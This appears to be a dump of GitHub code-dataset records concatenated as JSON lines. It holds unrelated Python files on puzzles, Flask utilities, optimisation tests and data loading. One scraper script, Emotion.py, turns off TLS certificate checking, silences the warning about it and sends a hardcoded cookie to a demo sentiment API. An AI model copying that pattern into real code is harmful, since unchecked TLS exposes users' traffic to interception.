cycle(y_range)\n\t\t\n\t\t# Now we simply mark those points in the pipePoint dataset\n\t\tfor point in zip(x_range, y_range):\n\t\t\tif point not in pipePoints: pipePoints[point] = 0\n\t\t\tpipePoints[point] += 1\n\t\n\t# Counting the number of points with overlaps\n\treturn sum(1 for overlap in pipePoints.values() if overlap >= 2)","repo_name":"fschatbot/Advent-Calendar-Python","sub_path":"2021/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33123367205","text":"from operator import ge, lt\nfrom datetime import datetime, timedelta\nfrom flask import flash\nfrom flowapp.constants import (\n    COMP_FUNCS,\n    TIME_YEAR,\n    TIME_US,\n    TIME_STMP,\n    TIME_FORMAT_ARG,\n    RULE_TYPES,\n    FORM_TIME_PATTERN,\n)\n\n\ndef other_rtypes(rtype):\n    \"\"\"\n    get rtype and return list of remaining rtypes\n    for example get ipv4 and return [ipv6, rtbh]\n    \"\"\"\n    result = list(RULE_TYPES.keys())\n    try:\n        result.remove(rtype)\n    except ValueError:\n        pass\n\n    return result\n\n\ndef output_date_format(json_request_data, pref_format=TIME_YEAR):\n    \"\"\"\n    prefer the user setting from the parameter; if the parameter is not set\n    then use the preferred format computed from the input date\n    \"\"\"\n    if not json_request_data:\n        return pref_format\n\n    if TIME_FORMAT_ARG in json_request_data and json_request_data[TIME_FORMAT_ARG]:\n        return json_request_data[TIME_FORMAT_ARG]\n    else:\n        return pref_format\n\n\ndef parse_api_time(apitime):\n    \"\"\"\n    check if the api time is in US, EU or timestamp format\n    :param apitime: string with date and time\n    :returns: datetime, preferred format\n    \"\"\"\n\n    apitime = str(apitime)\n    try:\n        return (\n            round_to_ten_minutes(datetime.strptime(apitime, FORM_TIME_PATTERN)),\n            TIME_US,\n        )\n    except ValueError:\n        mytime = False\n\n    try:\n        return round_to_ten_minutes(webpicker_to_datetime(apitime)), TIME_YEAR\n    except ValueError:\n        mytime = False\n\n    try:\n        return round_to_ten_minutes(webpicker_to_datetime(apitime, TIME_US)), TIME_US\n    except ValueError:\n        mytime = False\n\n    try:\n        return round_to_ten_minutes(datetime.fromtimestamp(int(apitime))), TIME_STMP\n    except OverflowError:\n        mytime = False\n    except ValueError:\n        mytime = False\n\n    return False\n\n\ndef quote_to_ent(comment):\n    \"\"\"\n    Convert all \" to &quot;\n    Used to sanitize comments, because the tooltip in the dashboard breaks when quotes are unescaped\n    :param comment: string to be sanitized\n    :return: string\n    \"\"\"\n    if comment:\n        return comment.replace('\"', \"&quot;\")\n\n\ndef webpicker_to_datetime(webtime, format=TIME_YEAR):\n    \"\"\"\n    convert 'YYYY/MM/DD HH:mm' to datetime\n    \"\"\"\n    if format == TIME_YEAR:\n        formating_string = \"%Y/%m/%d %H:%M\"\n    else:\n        formating_string = \"%m/%d/%Y %H:%M\"\n\n    return datetime.strptime(webtime, formating_string)\n\n\ndef datetime_to_webpicker(python_time, format=TIME_YEAR):\n    \"\"\"\n    convert datetime to 'YYYY/MM/DD HH:mm' string\n    \"\"\"\n    if format == TIME_YEAR:\n        formating_string = \"%Y/%m/%d %H:%M\"\n    else:\n        formating_string = \"%m/%d/%Y %H:%M\"\n\n    return datetime.strftime(python_time, formating_string)\n\n\ndef get_state_by_time(python_time):\n    \"\"\"\n    returns state for rule based on given time\n    if given time is in the past returns 2 (withdrawn rule)\n    else returns 1\n    :param python_time:\n    :return: integer rstate\n    \"\"\"\n    present = datetime.now()\n\n    if python_time <= present:\n        return 2\n    else:\n        return 1\n\n\ndef round_to_ten_minutes(python_time):\n    \"\"\"\n    Round the given time to 
the nearest ten minutes\n    :param python_time: datetime\n    :return: datetime\n    \"\"\"\n    python_time += timedelta(minutes=5)\n    python_time -= timedelta(\n        minutes=python_time.minute % 10,\n        seconds=python_time.second,\n        microseconds=python_time.microsecond,\n    )\n\n    return python_time\n\n\ndef flash_errors(form):\n    \"\"\"\n    Flash all error messages\n    :param form: WTForm object\n    :return: none\n    \"\"\"\n    for field, errors in form.errors.items():\n        for error in errors:\n            flash(\n                \"Error in the %s field - %s\" % (getattr(form, field).label.text, error)\n            )\n\n\ndef active_css_rstate(rtype, rstate):\n    \"\"\"\n    returns dict with rstates as keys and css class value\n    :param rstate: string\n    :return: dict\n    \"\"\"\n\n    return {\n        \"active\": \"\",\n        \"expired\": \"\",\n        \"all\": \"\",\n        \"ipv4\": \"\",\n        \"ipv6\": \"\",\n        \"rtbh\": \"\",\n        rtype: \"active\",\n        rstate: \"active\",\n    }\n\n\ndef get_comp_func(rstate=\"active\"):\n    try:\n        comp_func = COMP_FUNCS[rstate]\n    except IndexError:\n        comp_func = None\n    except KeyError:\n        comp_func = None\n\n    return comp_func\n","repo_name":"CESNET/exafs","sub_path":"flowapp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"42718478917","text":"# coding: utf-8\n\nimport json\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nheaders = {\n    'Referer': 'https://demo.pingpong.us/sentiment-analyzer/',\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',\n    'X-Requested-With': 'XMLHttpRequest',\n    'Cookie': '_ga=GA1.2.257438808.1602743624; uncode_privacy[consent_types]=%5B%5D; uncodeAI.screen=2560; uncodeAI.images=2880; uncodeAI.css=2560x1080@16.1; _gid=GA1.2.409086791.1603943134; _gat_gtag_UA_142588611_4=1; _gat_gtag_UA_125669591_1=1; tk_ai=woo%3AEXGV4Dr%2BC5Gp6jJPC6ku6V8H'\n}\n\n\ndef get_emotion(query) -> float:\n    query = query.encode().decode('utf-8')\n    url = 'https://demo.pingpong.us/api/sentiment.php'\n    resp = requests.get(url, params={'queries': query}, verify=False, headers=headers)\n    try:\n        resp_json = resp.json()\n    except json.decoder.JSONDecodeError:\n        print('[ ERROR ] Json Decode Error')\n        print(resp.text)\n\n        return 0.0\n\n    # For debugging\n    # print(resp_json)\n\n    try:\n        posneg = resp_json[0][1]\n    except IndexError:\n        print(f'[ ERROR ] Invalid Query ({query})')\n        print('└─[ MESSAGE ] Check whether the query is empty')\n\n        return 0.0\n\n    model_score = float(posneg.get('model_score'))\n    # score = posneg.get('message')\n\n    return model_score\n\n\nif __name__ == '__main__':\n    print(get_emotion('테스트 테스트 테스트'))\n","repo_name":"ch4n3-yoon/Emotion-Scraper","sub_path":"lib/Emotion.py","file_name":"Emotion.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21796229190","text":"\"\"\"\nFunction definition:\ndef function_name(param: type, param2: type, ...) 
-> return_type:\n    function body\n\"\"\"\n\n\ndef subtract(x: int,y: int) -> int:\n    return x - y\n\nresult = subtract(5,3)\nprint(result)\n\n# When calling a function, Python does not\n# check the parameter types or the return type!\nresult = subtract(1.1, 0.9)\nprint(result)\n\n\ndef my_sum(numbers: list) -> float:\n    \"\"\"\n    Takes a list of numbers (int, float) and\n    returns the sum of all its elements.\n\n    :param numbers: a list of numbers\n    :return: the sum of all elements in the list\n    \"\"\"\n    total = 0\n    for i in numbers:\n        total += i\n    return total\n\na = [1,2,3,4,5]\nprint(my_sum(a))\n\ndef my_mean(numbers: list) -> float:\n    \"\"\"\n    Takes a list of numbers and\n    returns the average of all its elements.\n\n    :param numbers: a list of numbers\n    :return: the average of all elements in the list\n    \"\"\"\n\n    total = 0\n    for i in numbers:\n        total += i\n    avg = total/len(numbers)\n    return avg\n    # Let's try the simple way:\n    # return my_sum(numbers)/len(numbers) --> this one line would be enough.\n\na = my_mean([915,123,483,154])\nprint(a)\n\n# Hold the Ctrl key and click on a function to jump to\n# the place where that function is defined.\n\n\n\n\n\n\n\n","repo_name":"junbyungchan/python","sub_path":"lec03_function/function03.py","file_name":"function03.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25562032820","text":"from typing import Union, Tuple, List, Callable, Literal, Any\nimport math\n\n\nclass Menu:\n    # Options should be either of form (option description, Menu of submenu)\n    # or (option description, function)\n    # The function must require no inputs but can output anything\n    # (although the output is expected to be None since it is not captured)\n    def __init__(self, options: List[Tuple[str, Union['Menu', Callable[[], Any]]]] = None,\n                 start_text: Union[str, Callable[[], str]]=None, loop=True):\n        if options is None:\n            self._options = []\n        else:\n            self._options: List[Tuple[str, Union['Menu', Callable[[], Any]]]] = options\n        self._start_text: Union[str, Callable[[], str]] = start_text\n        self._loop = loop\n\n    def add_option(self, option: Tuple[str, Union['Menu', Callable[[], Any]]]):\n        self._options.append(option)\n\n    @staticmethod\n    def prompt_integer(lower_bound: Union[int, Literal[-math.inf]], upper_bound: Union[int, Literal[math.inf]]) -> int:\n        # Prompts for an integer x, where lower_bound <= x < upper_bound until a valid one is entered\n        current = upper_bound\n        while current < lower_bound or current >= upper_bound:\n            input_string = input()\n            try:\n                current = int(input_string)\n                if current < lower_bound or current >= upper_bound:\n                    print(\"Invalid number entered. Please try again:\")\n            except ValueError:\n                print(\"Invalid number entered. Please try again:\")\n\n        return current\n\n    @staticmethod\n    def prompt_float(lower_bound: float, upper_bound: float) -> float:\n        # Prompts for a float x, where lower_bound <= x < upper_bound until a valid one is entered\n        current = upper_bound\n        while current < lower_bound or current >= upper_bound:\n            input_string = input()\n            try:\n                current = float(input_string)\n                if current < lower_bound or current >= upper_bound:\n                    print(\"Invalid number entered. Please try again:\")\n            except ValueError:\n                print(\"Invalid number entered. Please try again:\")\n        return current\n\n    def run(self):\n        while True:\n            if isinstance(self._start_text, str):\n                print(self._start_text)\n            elif callable(self._start_text):\n                print(self._start_text())\n\n            print(\"0. 
Back\")\n\n for i, option in enumerate(self._options):\n print(f\"{i + 1}: {option[0]}\")\n\n chosen_option = Menu.prompt_integer(0, len(self._options) + 1)\n\n if chosen_option == 0:\n break\n\n if isinstance(self._options[chosen_option - 1][1], Menu):\n self._options[chosen_option - 1][1].run()\n else:\n self._options[chosen_option - 1][1]()\n\n if not self._loop:\n break\n","repo_name":"garamlee500/RoutePlanner","sub_path":"src/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1347521770","text":"import re \n\ndef first_max(list):\n \"\"\" Takes a list of couples (letter, count), \n returns the first one with max count. \"\"\" \n max = 0\n letter = None\n for l, count in list:\n if count > max:\n max = count \n letter = l \n return letter, max \n\ndef get_five_most(s):\n s = sorted(s) \n\n # make a sorted list of (letter, count)\n lastc = None\n count = 0\n hist = [] \n s.append('X')\n for c in s:\n if c == lastc:\n count += 1 \n else:\n if lastc is not None:\n hist.append((lastc, count))\n lastc = c \n count = 1\n hist = sorted(hist)\n\n res = [] \n for i in range(5):\n l, c = first_max(hist)\n hist.remove((l, c)) \n res.append(l) \n\n return res\n \n\ndef is_room(s):\n s = s.strip() \n\n pattern = r'([a-z\\-].*)-([0-9].*)\\[(.*)\\]'\n letters, code, check = re.search(pattern, s).groups()\n\n code = int(code)\n letters = letters.replace('-','')\n five_most = sorted(get_five_most(letters))\n check = sorted(check)\n \n if five_most == check:\n return code \n\n return 0\n\ndef test():\n vals = ['aaaaa-bbb-z-y-x-123[abxyz]',\n 'a-b-c-d-e-f-g-h-987[abcde]',\n 'not-a-real-room-404[oarel]',\n 'totally-real-room-200[decoy]'] \n\n for val in vals:\n print(val, is_room(val))\n\n\n\nsum = 0\nwith open(\"input4.txt\") as file:\n for line in file:\n sum += is_room(line)\n\nprint(sum)\n \n","repo_name":"PetraVidnerova/AdventOfCode2016","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30122605023","text":"import numpy as np\nimport os\nfrom sklearn.preprocessing import normalize\n\ndef load(folder, num=400):\n chimeric, original_chimeric = loadSingleFolder(folder + \"/chimeric\", num)\n repeat, original_repeat = loadSingleFolder(folder + \"/repeat\", num)\n normal, original_normal = loadSingleFolder(folder + \"/normal\", num)\n \n combined = np.array([]).reshape(0, num)\n combined = np.append(combined, chimeric, axis=0)\n combined = np.append(combined, repeat, axis=0)\n combined = np.append(combined, normal, axis=0)\n \n original_combined = original_chimeric + original_repeat + original_normal\n \n original_combined_np = np.array(original_combined)\n \n p = np.random.permutation(len(combined))\n combined = combined[p]\n original_combined_np = original_combined_np[p]\n \n return combined, chimeric, repeat, normal, original_combined_np\n\ndef loadFast(folder, num=250):\n chimeric, original_chimeric = loadSingleFolderFast(folder + \"/chimeric\", num)\n repeat, original_repeat = loadSingleFolderFast(folder + \"/repeat\", num)\n normal, original_normal = loadSingleFolderFast(folder + \"/normal\", num)\n \n combined = np.array([]).reshape(0, num)\n combined = np.append(combined, chimeric, axis=0)\n combined = np.append(combined, repeat, axis=0)\n combined = np.append(combined, normal, axis=0)\n \n original_combined = 
original_chimeric + original_repeat + original_normal\n original_combined_np = np.array(original_combined)\n \n p = np.random.permutation(len(combined))\n combined = combined[p]\n original_combined_np = original_combined_np[p]\n \n return combined, chimeric, repeat, normal, original_combined_np\n \n\ndef load_test_set(folder, num=400):\n chimeric, _ = loadSingleFolder(folder + \"/chimeric_test\", num)\n left_repeat, _ = loadSingleFolder(folder + \"/left_repeat_test\", num)\n right_repeat, _ = loadSingleFolder(folder + \"/right_repeat_test\", num)\n normal, _ = loadSingleFolder(folder + \"/normal_test\", num)\n \n test_set_list = []\n test_set_list.append(chimeric)\n test_set_list.append(left_repeat)\n test_set_list.append(right_repeat)\n test_set_list.append(normal)\n \n return test_set_list\n \ndef loadSingleFolderFast(folder, num=250):\n result = np.array([]).reshape(0, num)\n original_result = []\n for file in os.listdir(folder):\n original = np.load(folder + \"/\" + file)\n result = np.append(result, normalize(interpolate(original, num)).reshape(1, num), axis=0)\n original_result.append(original)\n return result, original_result\n\n\ndef loadSingleFolder(folder, num=400):\n result = np.array([]).reshape(0, num)\n original_result = []\n for file in os.listdir(folder):\n original = list(np.load(folder + \"/\" + file))\n result = np.append(result, normalize(interpolate(original, num)).reshape(1, num), axis=0)\n original_result.append(original)\n return result, original_result\n\ndef saveResults(save_folder, results, original_data):\n i = 0\n for res in results:\n np.save(save_folder + \"/group_\" + str(res) + \"/number_\" + str(i) + \".npy\", original_data[i])\n i+=1\n\ndef saveTemp(temp_save_folder, data, chimeric, repeat, normal, original_data):\n np.save(temp_save_folder + \"/data.npy\", data)\n np.save(temp_save_folder + \"/chimeric.npy\", chimeric)\n np.save(temp_save_folder + \"/repeat.npy\", repeat)\n np.save(temp_save_folder + \"/normal.npy\", normal)\n np.save(temp_save_folder + \"/original_data.npy\", original_data)\n \ndef loadTemp(temp_save_folder):\n data = np.load(temp_save_folder + \"/data.npy\")\n chimeric = np.load(temp_save_folder + \"/chimeric.npy\")\n repeat = np.load(temp_save_folder + \"/repeat.npy\")\n normal = np.load(temp_save_folder + \"/normal.npy\")\n original_data = np.load(temp_save_folder + \"/original_data.npy\")\n return data, chimeric, repeat, normal, original_data\n\n#interpolation\ndef interpolate(coverage, num=400):\n x = np.linspace(0, 1, num=num)\n xp = np.linspace(0, 1, num=len(coverage))\n return np.interp(x, xp, coverage)\n\ndef f(x, ma, mi):\n return (x-mi) / (ma-mi)\n\ndef normalize(read):\n ma, mi = read.max(), read.min()\n fun = np.vectorize(f)\n return fun(read, ma, mi)","repo_name":"jantomlj/Experimenting-with-signal-clustering","sub_path":"datahandling.py","file_name":"datahandling.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21166137042","text":"# coding: utf-8\n\ndef cleanspace(st):\n return st.replace(' ','').replace('\\n','').replace('\\t','')\n\ndef cvxcomp(A,B):\n return max([abs(v) for v in A-B])\n\nSOLVER = 'cvxopt'\n\n#-------------#\n# print test #\n#-------------#\n\nimport picos as pic\nprint('starting tests with picos'+str(pic.__version__))\n\nprob = pic.Problem()\nx = prob.add_variable('x',1, vtype='integer') #scalar integer variable\nprob.add_constraint(x<5.2) #x less or equal to 5.2\nprob.set_objective('max',x) 
#maximize x\nassert(cleanspace(str(prob)) == cleanspace(\n '---------------------\\noptimization problem (MIP):\\n1 variables, 1 affine constraints\\n\\nx \\t: (1, 1), integer\\n\\n\\tmaximize x\\nsuch that\\n x < 5.2\\n---------------------'))\n\n\n#--------------------------#\n# optdes example in intro #\n#--------------------------#\n\nimport numpy as np\nimport cvxopt as cvx\n\n#generate data\nA = [ cvx.sparse([[1 ,2 ,0 ],\n [2 ,0 ,0 ]]),\n cvx.sparse([[0 ,2 ,2 ]]),\n cvx.sparse([[0 ,2 ,-1],\n [-1,0 ,2 ],\n [0 ,1 ,0 ]])\n ]\nK = cvx.sparse([[1 ,1 ,1 ],\n [1 ,-5,-5]])\n\n#size of the data\ns = len(A)\nm = A[0].size[0]\nl = [ Ai.size[1] for Ai in A ]\nr = K.size[1]\n\n#creates a problem and the optimization variables\nprob = pic.Problem()\nmu = prob.add_variable('mu',s)\nZ = [prob.add_variable('Z[' + str(i) + ']', (l[i],r))\n for i in range(s)]\n\n#convert the constants into params of the problem\nA = pic.new_param('A',A)\nK = pic.new_param('K',K)\n\n#add the constraints\nprob.add_constraint( pic.sum([ A[i]*Z[i] for i in range(s)], #summands\n 'i', #name of the index\n '[s]' #set to which the index belongs\n ) == K\n )\nprob.add_list_of_constraints( [ abs(Z[i]) < mu[i] for i in range(s)], #constraints\n 'i', #index of the constraints\n '[s]' #set to which the index belongs\n )\n\n#sets the objective\nprob.set_objective('min', 1 | mu ) # scalar product of the vector of all ones with mu\n\n#call to the solver cvxopt\nsol = prob.solve(solver=SOLVER, verbose = 0)\n\nassert( max([abs(v) for v in (mu.value - cvx.matrix([[0.66017],[ 2.4189],[ 0.1640]]).T)]) < 1e-4)\n\nassert(max([abs(v) for v in (prob.get_constraint(0).dual - cvx.matrix([-0.3412770157278555, 0.09164120429815878, -0.18755919557221587, -0.35241708871373845, 0.23181086079278834, 0.2589026387700825]))]) < 1e-5)\n\n#----------------------------#\n# Some tests of the tuto #\n#----------------------------#\n\npairs = [(0,2), (1,4), (1,3), (3,2), (0,4),(2,4)] #a list of pairs\nA = []\nb = ( [0 ,2 ,0 ,3 ], #a tuple of 5 lists, each of length 4\n [1 ,1 ,0 ,5 ],\n [-1,0 ,2 ,4 ],\n [0 ,0 ,-2,-1],\n [1 ,1 ,0 ,0 ]\n )\nfor i in range(5):\n A.append(cvx.matrix(range(i-3,i+5),(2,4))) #A is a list of 2x4 matrices\nD={'Peter': 12,\n 'Bob' : 4,\n 'Betty': 7,\n 'Elisa': 14\n }\nprob = pic.Problem()\nt = prob.add_variable('t',1) #a scalar\nx = prob.add_variable('x',4) #a column vector\nY = prob.add_variable('Y',(2,4)) #a matrix\nZ = []\nfor i in range(5):\n Z.append( prob.add_variable('Z[{0}]'.format(i),(4,2)) )# a list of 5 matrices\nw={}\nfor p in pairs: #a dictionary of (scalar) binary variables, indexed by our pairs\n w[p] = prob.add_variable('w[{0}]'.format(p),1 , vtype='binary')\n\nassert( cleanspace(str(w[2,4])) == cleanspace('# variable w[(2, 4)]:(1 x 1),binary #') )\nassert( cleanspace(str(Y)) == cleanspace('# variable Y:(2 x 4),continuous #') )\nassert( w[2,4].vtype == 'binary')\nassert( x.vtype =='continuous')\nassert(x.size==(4,1))\nassert( not(Z[0].is_valued()))\nZ[1].value = A[0].T\nassert( Z[1].is_valued())\nassert( Z[2].name == 'Z[2]')\n\nAA = pic.new_param('A',A)\nAlpha = pic.new_param('alpha',12)\nalpha = 12\nDD = pic.new_param('D',D)\nbb = pic.new_param('b',b)\nx_minus_1 = x - 1\nassert(cleanspace(str(x_minus_1)) == cleanspace('# (4 x 1)-affine expression: x -|1| #') )\n\n#-----------------------------------#\n# some tests with valued variables #\n#-----------------------------------#\n\nZ[0].value = list(range(0,8))\nZ[1].value = list(range(8,16))\nZ[2].value = list(range(16,24))\nZ[3].value = list(range(24,32))\nZ[4].value = 
list(range(32,40))\nt.value = -1\nw[0, 2].value = 0\nw[1, 4].value = 0\nw[1, 3].value = 1\nw[3, 2].value = 1\nw[0, 4].value = 0\nw[2, 4].value = 1\nx.value = list(range(-5,-1))\n\nZv = [Zi.eval() for Zi in Z]\ntv = t.value\nwv = pic.tools.eval_dict(w)\nxv = x.value\n\n#left right multiplication\nassert( cvxcomp((AA[1]*Z[0]*AA[2]).value, A[1]*Zv[0]*A[2]) < 1e-6)\n#dot product\nassert( cvxcomp( ( bb[2] | x ).value, bb[2].T.value * xv) < 1e-6 )\n#hadamard\nassert( cvxcomp( (bb[1]^x).value, cvx.matrix([bi*xi for bi,xi in zip(bb[1].value,xv)]) )< 1e-6 )\n#concatenation\nRHS = cvx.matrix([[ 1.00e+00, -1.00e+00, -5.00e+00, -2.20e+01],\n [ 1.00e+00, 0.00e+00, -4.00e+00, -1.00e+01],\n [ 0.00e+00, 2.00e+00, -3.00e+00, 2.00e+00],\n [ 5.00e+00, 4.00e+00, -2.00e+00, 1.40e+01],\n [-5.00e+00, -4.00e+00, -3.00e+00, -2.00e+00]]).T\nassert( cvxcomp(((bb[1] & bb[2] & x & AA[0].T*AA[0]*x) // x.T).value,RHS) < 1e-6)\n\n#sum\nassert(cvxcomp(\n pic.sum([A[i]*Z[i] for i in range(5)],'i','[5]').value,\n sum([A[i]*Zv[i] for i in range(5)])) < 1e-6\n )\n\n#norm\nassert( abs(Z[1]-2*A[0].T).value[0] == np.linalg.norm(Zv[1]-2*A[0].T,'fro'))\n\n#quad\nassert(cvxcomp( (x +2 | Z[1][:,1]).value, (xv+2).T * Zv[1][:,1]) < 1e-6)\n\n#constring\nassert(cleanspace(str(pic.sum([AA[i]*Z[i] for i in range(5)],'i','[5]') == 0))\n == cleanspace(str('# (2x2)-affine constraint: Σ_{i in [5]} A[i]*Z[i] = |0| #'))\n )\n\n\n#cons slacks\nassert( (abs(x) < (2|x-1)).slack[0] == 2*sum(xv-1)- np.linalg.norm(xv))\nassert( (1 < (t-1)*(x[2]+x[3]) ).slack[0] == ((tv-1) * (xv[2]+xv[3])-1)[0])\n\n#powers\nassert((Z[0][4]**(2./3)).value == Zv[0][4]**(2./3))\nassert( cvxcomp(\n ((1-t)**0.6666 > x[0]).slack,\n (1-tv)**0.6666 - xv[0]) < 1e-4)\n\nassert((pic.norm(-x,'inf') < 2).slack[0] == -3)\n\nM = prob.add_variable('M',(5,5),'symmetric')\nM.value = [1+(i+j)+2*(i+j)**2-0.01*(i+j)**4 + (25 if i==j else 0) for i in range(5) for j in range(5)]\nassert( cvxcomp((t < pic.detrootn(M)).slack, np.linalg.det(M.value)**(1./5) - tv[0] ) < 1e-6)\n\n#---------------#\n# Complex SDP #\n#---------------#\n\nP = pic.Problem()\nZ = P.add_variable('Z',(3,2),'complex')\n\nassert(cleanspace(str(Z.real))==cleanspace('# variable Z_RE:(3 x 2),continuous #'))\nassert(cleanspace(str(Z.imag))==cleanspace('# variable Z_IM:(3 x 2),continuous #'))\nassert(Z.vtype == 'complex')\n\nP = cvx.matrix([ [1-1j , 2+2j , 1 ],\n [3j , -2j , -1-1j],\n [1+2j, -0.5+1j, 1.5 ]\n ])\nP = P * P.H\n\nQ = cvx.matrix([ [-1-2j , 2j , 1.5 ],\n [1+2j ,-2j , 2.-3j ],\n [1+2j ,-1+1j , 1+4j ]\n ])\nQ = Q * Q.H\n\nn=P.size[0]\nP = pic.new_param('P',P)\nQ = pic.new_param('Q',Q)\n\n#create the problem in picos\nF = pic.Problem()\nZ = F.add_variable('Z',(n,n),'complex')\n\nF.set_objective('max','I'|0.5*(Z+Z.H)) #('I' | Z.real) works as well\nF.add_constraint(((P & Z) // (Z.H & Q))>>0 )\n\n\nF.solve(solver=SOLVER,verbose = 0)\nassert(abs(F.obj_value()-37.4742)<1e-4)\nsol = cvx.matrix([\n [ 1.51e+01+2.21e+00j, -7.17e+00-1.22e+00j, 2.52e+00+6.87e-01j],\n [-4.88e+00+4.06e+00j, 1.00e+01-1.57e-01j, 8.33e+00+1.13e+01j],\n [-4.32e-01+2.98e-01j, 3.84e+00-3.28e+00j, 1.24e+01-2.05e+00j]]).T\n \n#very coarse test because I just pasted the string repr of the solution\nassert(max([abs(v)/abs(z) for v,z in zip(sol-Z.value,sol)])<0.005)\n\nM = pic.new_param('M',Q)\nn=3\n\nP = pic.Problem()\nU = P.add_variable('U',(n,n),'hermitian')\nP.add_list_of_constraints([U[i,i]==1 for i in range(n)],'i')\nP.add_constraint(U >> 0)\n\nP.set_objective('min', U | M)\nP.solve(solver=SOLVER,verbose=0)\nsolstr = \"\"\"\n[ 1.00e+00-j0.00e+00 
9.97e-01-j7.20e-02 -9.22e-01-j3.86e-01]\n[ 9.97e-01+j7.20e-02 1.00e+00-j0.00e+00 -8.92e-01-j4.51e-01]\n[-9.22e-01+j3.86e-01 -8.92e-01+j4.51e-01 1.00e+00-j0.00e+00]\n \"\"\"\n\nassert(cleanspace(str(U))==cleanspace(solstr))\n\nprint('everything seems to work fine')","repo_name":"gsagnol/picos","sub_path":"unitTest/doctest_py3.py","file_name":"doctest_py3.py","file_ext":"py","file_size_in_byte":8416,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"48"} +{"seq_id":"30112700375","text":"from datetime import datetime\nfrom sklearn import linear_model\n\n# Read in prices from file\ndef getData(datefile, pricefile):\n dfile = open(datefile, 'r')\n dates = dfile.read().split()\n dfile.close()\n pfile = open(pricefile, 'r')\n prices = pfile.read().split()\n pfile.close()\n for i in range(len(dates)):\n dates[i] = datetime.strptime(dates[i], '%m/%d/%y')\n prices[i] = float(prices[i])\n return (dates, prices)\n\n# Calculate trendline - return a from linear equation y = ax + b\ndef calcTrendline(prices, i, n):\n points = prices[i-n+1:i+1]\n indices = [[index] for index in range(i-n+1, i+1)]\n\n # Do linear regression\n clf = linear_model.LinearRegression()\n clf.fit(indices, points)\n a = clf.coef_[0]\n b = clf.intercept_\n p = clf.predict([[i+1]])\n return a\n\n# Momentum for day i with period n\ndef calcMomentum(prices, i, n):\n return prices[i] - prices[i-n]\n\n# Rate of change for day i with period n\ndef calcROC(prices, i, n):\n return (prices[i] - prices[i-n]) / prices[i-n]\n\n# Calculate %K (helper for stochastic oscillator)\ndef calcK(prices, i, n):\n high = max(prices[i-n:i+1])\n low = min(prices[i-n:i+1])\n return (prices[i] - low) / (high - low) * 100\n\n# Return stochastic signal on day i with period n\ndef calcStochastic(prices, i, n):\n curr_K = calcK(prices, i, n)\n prev_K = calcK(prices, i-1, n)\n curr_D = sum([calcK(prices, i-j, n) for j in range(3)])/3\n prev_D = sum([calcK(prices, i-j-1, n) for j in range(3)])/3\n if prev_D < 20 and curr_K < 20 and prev_K < prev_D \\\n and curr_D < curr_K: return \"Buy\"\n if prev_D > 80 and curr_K > 80 and prev_K > prev_D \\\n and curr_D > curr_K: return \"Sell\"\n return \"Hold\"\n\n# Make feature vector for day i\ndef makeFeatures(prices, i):\n x = []\n y_classify = 1 if prices[i+1] > prices[i] else 0\n y_regression = (prices[i+1] - prices[i]) / prices[i] * 100\n\n # Add trendlines\n arr = [2, 3, 5, 8, 15, 17]\n for n in arr:\n x = x + [calcTrendline(prices, i, n), calcTrendline(prices, i-1, n)]\n \n # Calculate momentum/ROC\n curr_roc = calcROC(prices, i, 1)\n x = x + [curr_roc]\n for n in arr:\n roc = calcROC(prices, i, n)\n x = x + [roc, curr_roc/roc if roc != 0 else curr_roc]\n\n # Add stochastic %K\n x = x + [calcK(prices, i, 14)]\n return (x, y_classify, y_regression)\n","repo_name":"mpotoski/gold","sub_path":"gold.py","file_name":"gold.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"5995344042","text":"\"\"\"\nThis module describes how to manually train and test an algorithm without using\nthe evaluate() function.\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport sys\nimport numpy as np\n\nfrom surprise import KNNBasic\nfrom surprise import KNNBaseline\nfrom surprise import Dataset\nfrom surprise import Reader\nfrom surprise import evaluate\n\nfrom tools.utils import CVScoreTuple\nfrom tools.utils import write2csv\nfrom tools.utils 
